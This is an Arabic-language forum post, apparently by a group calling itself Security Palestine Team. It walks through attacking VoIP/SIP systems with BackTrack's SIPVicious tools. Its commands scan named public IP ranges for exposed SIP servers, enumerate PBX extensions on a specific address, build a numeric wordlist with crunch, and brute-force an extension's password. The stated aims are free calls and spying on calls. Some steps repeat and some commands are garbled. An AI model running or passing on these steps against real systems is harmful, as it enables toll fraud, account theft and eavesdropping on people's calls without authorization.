السلام عليكم ورحمة الله وبركاته
سأشرح اليوم بحول الله طريقة الحصول على آيبيات إتصال sip في تقنية voip وكيفية الحصول على اليوزرات والباسوردات ب Backtrack 5R1 وذلك لإجراء مكالمات مجانية أو التجسس على المكالمات إلخ ...
أولا نقوم بفتح الترمينال ونكتب
سأشرح اليوم بحول الله طريقة الحصول على آيبيات إتصال sip في تقنية voip وكيفية الحصول على اليوزرات والباسوردات ب Backtrack 5R1 وذلك لإجراء مكالمات مجانية أو التجسس على المكالمات إلخ ...
أولا نقوم بفتح الترمينال ونكتب
اقتباس:
root@root:~# cd /pentest/voip/sipvicious
ثم بعد ذلك سنقوم بعمل سكان على رنج آيبي لجلب بعض الآيبيات المصابة بإستخدام أداة svmap
اقتباس:
root@root:~# /pentest/voip/sipvicious/svmap.py 190.145.50.0/24
كما ترون في الصورة تم الحصول على بعض الآيبيات المصابة
أخي الكريم في حالة لم تحصل على أي آيبي مصاب في هذا الرنج يمكنك تغيير الرنج آيبي
190.145.0.0/24
196.123.74.0/16
إلى نحو ذلك
الآن إخواني سنقوم بإستخراج بعض ايوزرات أو أرقام التحويل المخزنة في PBX
سنستخدم أداة svwar
اقتباس:
root@root:~# cd /pentest/voip/sipvicious/ ./svwar.py 190.145.50.189 -m Invite
كما ترون في الصورة تم إستخراج بعض اليوزرات
ملاحضة : لمشاهدة كيف تحصل عملية إستخراج اليوزرات يمكنك أخي إضافة - vv
اقتباس:
root@root:~# /pentest/voip/sipvicious/ ./svwar.py 190.145.50.189 -m Invite - vv
الآن سنقوم بعمل قائمة باسوردات بإستخدام أداة crunch
نقوم بفتح ترمينال أخر ونكتب
نقوم بفتح ترمينال أخر ونكتب
اقتباس:
root@root:~# cd /pentest/passwords/crunch
أأخي لمشاهدة كيف تعمل الأداة يمكنك كتابة
اقتباس:
root@root:~# /pentest/passwords/crunch# man crunch
هنا سنسقوم بعمل قائمة باسورد تتكون من أرقام من 1 إلى 999999 لأنو الحقيقة في الغالب تكون الباسوردات أرقام
قبل ذلك نقوم بعمل ملف جديد لوضع الباسوردات فيه نفتح ترمينال آخر ونكتب
ولو كان عندنا يورزرات موجودة بسكربت .. بنضعها لأنها ستفيدنا كثيرآ ...
قبل ذلك نقوم بعمل ملف جديد لوضع الباسوردات فيه نفتح ترمينال آخر ونكتب
ولو كان عندنا يورزرات موجودة بسكربت .. بنضعها لأنها ستفيدنا كثيرآ ...
اقتباس:
root@root:~# cd /pentest/voip/sipvicious
ثم
اقتباس:
root@root:~# /pentest/voip/sipvicious# *> gaza.txt
الآن نقوم بعمل قائمة باسوردات بأداة crunch
اقتباس:
root@root:~# /pentest/passwords/crunch# ./crunch 1 6 -f charset.lst numeric -o /pentest/voip/sipvicious/gaza.txt
الآن بعد إنشاء قائمة الباسوردات نأتي إلى مرحلة الكراك
سنستخدم أخي الكريم أداة svrack
نكتب أخي كالآتي
اقتباس:
root@root:~# /pentest/voip/sipvicious# svcrack -u231 -w gaza.txt 190.145.50.189
كما ترون إخواني تم الحصول على الباسورد ، وليس دائما يكون اليوزر مثل الباسورد أحيان تكون الباسورد حروف ..
الحمد لله تم بنجاح
تحيآتي لكم وإن شاء الله الجميع يستفيد
============
أتمنى من الله عزوجل أن أكون قد وفقت فى توصيل هذه المعلومة
مــــــــع أطـيــــــب تمنـيــــــــاتى بالتــوفيـــــــق للجمـيـــــــــع
===================================
مـــــع خــــالـــــص تـحـيــــاتــــى
ÃRêstø ĦąĈķễr
==============Security Palestine Team==============
0 التعليقات:
إرسال تعليق